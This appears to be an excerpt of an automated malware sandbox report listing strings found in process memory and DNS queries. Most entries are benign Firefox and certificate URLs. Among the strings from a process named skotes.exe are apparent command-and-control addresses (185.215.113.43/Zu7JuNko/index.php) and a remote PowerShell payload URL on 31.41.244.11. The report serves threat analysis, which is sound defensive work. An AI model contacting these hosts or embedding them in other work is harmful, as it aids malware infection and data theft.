Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3262808062.000001A8C3D9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3233508837.000001A8C3D6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xe=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B7453000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/3405117-2476756634-1003
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php;A
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpOAP
Source: skotes.exe, 00000006.00000002.3278202583.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpc
Source: skotes.exe, 00000006.00000002.3278202583.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpf
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpkAl
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded%
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/dx
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/l
Source: skotes.exe, 00000006.00000002.3278202583.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3278202583.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/5124158732/KQGBYWk.ps1
Source: skotes.exe, 00000006.00000002.3278202583.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/5124158732/KQGBYWk.ps1XYZ0123456789
Source: skotes.exe, 00000006.00000002.3278202583.00000000009C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/5124158732/KQGBYWk.ps1swsock.dll
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/Di
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000010.00000002.3311223574.000001A8B2ABA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
Source: svchost.exe, 0000000C.00000002.3297975932.0000029748A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digi
Source: firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/QX
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B498C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000010.00000002.3330787150.000001A8B6F81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7C70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B493B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7C70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7CE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000010.00000003.3235722215.000001A8C37BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3343255794.000001A8B7E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000010.00000002.3336679664.000001A8B7240000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B278A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B2781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B278A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B2781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000010.00000002.3307005394.000001A8B278A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsp
Source: svchost.exe, 0000000C.00000003.2982483521.0000029748840000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.3030468982.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000010.00000003.3166689570.000001A8C029B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3262271793.000001A8B84F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3212699709.000001A8C02BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3216367236.000001A8C02BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000010.00000003.3263352248.000001A8C37E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3153226064.000001A8B7DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3122752444.000001A8B7DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3155324261.000001A8B7DED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235722215.000001A8C37DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000010.00000003.3153226064.000001A8B7DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3122752444.000001A8B7DE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3155324261.000001A8B7DED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/9
Source: firefox.exe, 00000010.00000003.3225852250.000001A8B8034000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3136123245.000001A8C0072000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3338609624.000001A8B77AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3126451477.000001A8B7F1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3126451477.000001A8B7F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3345552050.000001A8B7F32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3168949956.000001A8B7F71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3214998427.000001A8C0042000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3246944068.000001A8B91AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3123477613.000001A8B7FB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144090733.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3125375221.000001A8B7FEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3217438778.000001A8B7F64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3168949956.000001A8B7F6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3208529617.000001A8B7F13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3122026688.000001A8B7FB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3329068400.000001A8B6D37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3258702322.000001A8B8CED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3128048077.000001A8C0072000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3220095844.000001A8B66D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144473251.000001A8B7F71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000010.00000002.3344282918.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3274109850.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000010.00000002.3344282918.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3274109850.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.3030468982.0000000004A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%squicksuggest.impressionCaps.stats
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: firefox.exe, 00000010.00000003.3275418110.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3231894604.000001A8B2A98000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%sgecko.handlerService.defaultHandlersVersionextractScheme/fixupC
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000010.00000003.3275175701.000001A8B2AAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: firefox.exe, 00000010.00000003.3236983756.000001A8BFD4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000010.00000003.3270733582.000001A8B8604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B33A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3106604957.000001A8B8ED3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3398000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8B6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6159000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000010.00000003.3258101012.000001A8B8D4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3328304158.000001A8B6B21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/sessionstore/Pri
Source: firefox.exe, 00000010.00000002.3344282918.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3274109850.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000010.00000002.3344282918.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3274109850.000001A8B7E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
